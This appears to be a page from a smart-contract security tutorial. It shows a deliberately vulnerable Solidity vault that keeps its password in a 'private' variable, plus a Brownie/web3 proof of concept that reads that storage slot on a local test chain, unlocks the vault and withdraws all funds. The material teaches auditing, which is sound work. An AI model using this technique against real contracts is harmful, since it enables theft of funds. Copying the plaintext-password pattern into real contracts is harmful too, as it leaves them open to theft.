👾Exploit PoC

Contract

pragma solidity ^0.8.0;

contract ColdStorageVault {
    bool public is_locked;
    string private my_password;

    constructor(string memory password) payable {
        is_locked = true;
        my_password = password;
    }

    function WithdrawAll() public   {
        require(is_locked == false, "Withdraw function locked");
        payable (msg.sender).transfer(address(this).balance);
    }

    function unlock(string memory password) external returns (string memory) {
        if (keccak256(abi.encodePacked(my_password)) == keccak256(abi.encodePacked(password))) {
            is_locked = false;
            return "Correct password";
        }
        else{
            return "Bad Password";
            }
        
    }
    function lock() external {
        is_locked = true;
    }

}

# Setting up project folder
mkdir VAULT
cd VAULT
brownie init
brownie compile

Proof of Concept using Brownie

from brownie import accounts, ColdStorageVault
from web3 import Web3
import re



web3 = Web3(Web3.HTTPProvider('http://127.0.0.1:8545'))

account0 = accounts[0]
account1 = accounts[1]


def DeployColdStorageVault():
	cold_storage = ColdStorageVault.deploy("test123", {"from": account0, "value": 1000000000000000000})
	return cold_storage

def GetPrivatePassword(cold_storage):
	contract_address = str(cold_storage)
	password = web3.eth.get_storage_at(contract_address, 1).decode()
	print(password)
	password = re.sub('[^0-9a-zA-Z]', '', password)
	return password

def UnlockAndWithdraw(password, cold_storage):
	is_locked = cold_storage.is_locked()

	if is_locked:
		print(f'Locked: {is_locked} preparing to unlock ...')
		cold_storage.unlock(password, {"from": account1})

		is_locked = cold_storage.is_locked()
		print(is_locked)
		
		if is_locked:
			print("Incorrect Password")
		else:
			print("Contract Unlocked...")
			print(f'Starting Balance: {account1.balance()}')
			print("Withdrawing all funds...")
			cold_storage.WithdrawAll({"from": account1})
			
			print(f'Balance after attack: {account1.balance()}')
	

def main():
	cold_storage = DeployColdStorageVault()
	password = GetPrivatePassword(cold_storage)
	UnlockAndWithdraw(password, cold_storage)

# Commands to run
brownie run scripts/poc.py

REFERENCES

https://github.com/cclabsInc/Python-SmartContact-BlockchainExploitation/blob/main/Part2_Frameworks/

PreviousBrownie Interactions NextSmart Contract Audits

Last updated 3 months ago